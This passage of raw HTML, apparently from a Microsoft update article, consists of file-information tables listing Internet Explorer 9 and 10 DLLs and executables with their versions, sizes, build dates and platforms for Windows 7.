class=\"sbody-td\">768,512</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">768,512</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">231,936</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">231,936</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:26</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdebuggeride.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">104,448</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:15</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdebuggeride.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">104,448</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:30</td><td class=\"sbody-td\">x86</td></tr></table></div><h3 class=\"sbody-h3\">Internet Explorer 10 </h3><h4 class=\"sbody-h4\">Internet Explorer 10 on all supported x86-based versions of Windows 7 </h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">1,141,248</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:28</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">1,137,664</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">770,648</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:54</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">770,648</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">00:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">39,424</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">1,767,936</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:28</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">38,400</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">1,777,152</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">493,056</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">20-Sep-2013</td><td class=\"sbody-td\">23:06</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">493,056</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">20-Sep-2013</td><td class=\"sbody-td\">22:41</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie9props.propdesc</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">2,843</td><td class=\"sbody-td\">09-Oct-2012</td><td class=\"sbody-td\">01:08</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Registeriepkeys.exe</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">71,680</td><td class=\"sbody-td\">21-Sep-2013</td><td class=\"sbody-td\">02:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie9props.propdesc</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">2,843</td><td class=\"sbody-td\">10-Oct-2012</td><td class=\"sbody-td\">01:36</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Registeriepkeys.exe</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">71,680</td><td class=\"sbody-td\">21-Sep-2013</td><td class=\"sbody-td\">02:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">3,228</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:20</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">10.0.9200.16721</td><td class=\"sbody-td\">14,335,488</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">2,706,432</td><td class=\"sbody-td\">21-Sep-2013</td><td class=\"sbody-td\">03:30</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">3,228</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:20</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">10.0.9200.20831</td><td class=\"sbody-td\">14,364,672</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">2,706,432</td><td class=\"sbody-td\">21-Sep-2013</td><td class=\"sbody-td\">03:05</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">257,536</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">257,536</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">236,032</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">236,032</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msdbg2.dll</td><td class=\"sbody-td\">11.0.50613.2</td><td class=\"sbody-td\">285,080</td><td class=\"sbody-td\">06-Jul-2012</td><td class=\"sbody-td\">19:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pdm.dll</td><td class=\"sbody-td\">11.0.50613.2</td><td class=\"sbody-td\">392,080</td><td class=\"sbody-td\">06-Jul-2012</td><td class=\"sbody-td\">19:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pdmproxy100.dll</td><td class=\"sbody-td\">11.0.50613.2</td><td class=\"sbody-td\">70,568</td><td class=\"sbody-td\">06-Jul-2012</td><td class=\"sbody-td\">19:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pdmsetup.exe</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">69,120</td><td class=\"sbody-td\">21-Sep-2013</td><td class=\"sbody-td\">02:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msdbg2.dll</td><td class=\"sbody-td\">11.0.50613.2</td><td class=\"sbody-td\">285,080</td><td class=\"sbody-td\">06-Jul-2012</td><td class=\"sbody-td\">19:52</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pdm.dll</td><td class=\"sbody-td\">11.0.50613.2</td><td class=\"sbody-td\">392,080</td><td class=\"sbody-td\">06-Jul-2012</td><td class=\"sbody-td\">19:52</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pdmproxy100.dll</td><td class=\"sbody-td\">11.0.50613.2</td><td class=\"sbody-td\">70,568</td><td class=\"sbody-td\">06-Jul-2012</td><td class=\"sbody-td\">19:52</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pdmsetup.exe</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">69,120</td><td class=\"sbody-td\">21-Sep-2013</td><td class=\"sbody-td\">02:28</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">2,048,512</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.2.9200.16720</td><td class=\"sbody-td\">217,600</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:28</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">2,079,744</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.2.9200.20830</td><td class=\"sbody-td\">219,648</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">42,496</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:28</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">33,280</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesetup.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">61,440</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">42,496</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">33,280</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesetup.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">61,440</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesysprep.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">109,056</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesysprep.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">109,056</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">817,664</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:28</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">817,664</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">13,761,024</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">25,923</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:19</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">391,168</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">13,737,984</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">25,923</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:20</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">391,168</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdebuggeride.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">108,032</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdebuggeride.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">108,032</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript9.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">2,876,928</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript9.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">2,880,000</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript.dll</td><td class=\"sbody-td\">5.8.9200.16720</td><td class=\"sbody-td\">690,688</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript.dll</td><td class=\"sbody-td\">5.8.9200.20830</td><td class=\"sbody-td\">690,688</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 10 on all supported x64-based versions of Windows 7 and Windows Server 2008 R2</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">1,365,504</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:55</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">1,350,656</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:23</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">775,256</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">01:25</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">775,256</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">01:55</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">53,248</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:54</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">2,241,024</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:55</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">53,248</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:22</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">2,248,704</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:23</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">603,136</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:54</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">20-Sep-2013</td><td class=\"sbody-td\">23:05</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">603,136</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:23</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">20-Sep-2013</td><td class=\"sbody-td\">22:40</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie9props.propdesc</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">2,843</td><td class=\"sbody-td\">09-Oct-2012</td><td class=\"sbody-td\">03:09</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Registeriepkeys.exe</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">89,600</td><td class=\"sbody-td\">21-Sep-2013</td><td class=\"sbody-td\">02:48</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie9props.propdesc</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">2,843</td><td class=\"sbody-td\">22-Jul-2013</td><td class=\"sbody-td\">22:14</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Registeriepkeys.exe</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">89,600</td><td class=\"sbody-td\">21-Sep-2013</td><td class=\"sbody-td\">02:46</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">3,228</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:19</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">10.0.9200.16721</td><td class=\"sbody-td\">19,252,224</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:54</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">2,706,432</td><td class=\"sbody-td\">21-Sep-2013</td><td class=\"sbody-td\">03:38</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">3,228</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:19</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">10.0.9200.20831</td><td class=\"sbody-td\">19,494,912</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:23</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">2,706,432</td><td class=\"sbody-td\">21-Sep-2013</td><td class=\"sbody-td\">03:34</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">701,952</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:54</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">701,952</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:22</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">356,864</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:54</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">356,352</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:22</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msdbg2.dll</td><td class=\"sbody-td\">11.0.50613.2</td><td class=\"sbody-td\">368,024</td><td class=\"sbody-td\">06-Jul-2012</td><td class=\"sbody-td\">20:11</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pdm.dll</td><td class=\"sbody-td\">11.0.50613.2</td><td class=\"sbody-td\">514,952</td><td class=\"sbody-td\">06-Jul-2012</td><td class=\"sbody-td\">20:11</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pdmproxy100.dll</td><td class=\"sbody-td\">11.0.50613.2</td><td class=\"sbody-td\">72,624</td><td class=\"sbody-td\">06-Jul-2012</td><td class=\"sbody-td\">20:11</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pdmsetup.exe</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">86,528</td><td class=\"sbody-td\">21-Sep-2013</td><td class=\"sbody-td\">03:01</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msdbg2.dll</td><td class=\"sbody-td\">11.0.50613.2</td><td class=\"sbody-td\">368,024</td><td class=\"sbody-td\">22-Jul-2013</td><td class=\"sbody-td\">22:13</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pdm.dll</td><td class=\"sbody-td\">11.0.50613.2</td><td class=\"sbody-td\">514,952</td><td class=\"sbody-td\">22-Jul-2013</td><td class=\"sbody-td\">22:13</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pdmproxy100.dll</td><td class=\"sbody-td\">11.0.50613.2</td><td class=\"sbody-td\">72,624</td><td class=\"sbody-td\">22-Jul-2013</td><td class=\"sbody-td\">22:13</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pdmsetup.exe</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">86,528</td><td class=\"sbody-td\">21-Sep-2013</td><td class=\"sbody-td\">02:58</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">2,647,552</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:54</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.2.9200.16720</td><td class=\"sbody-td\">278,528</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:55</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td 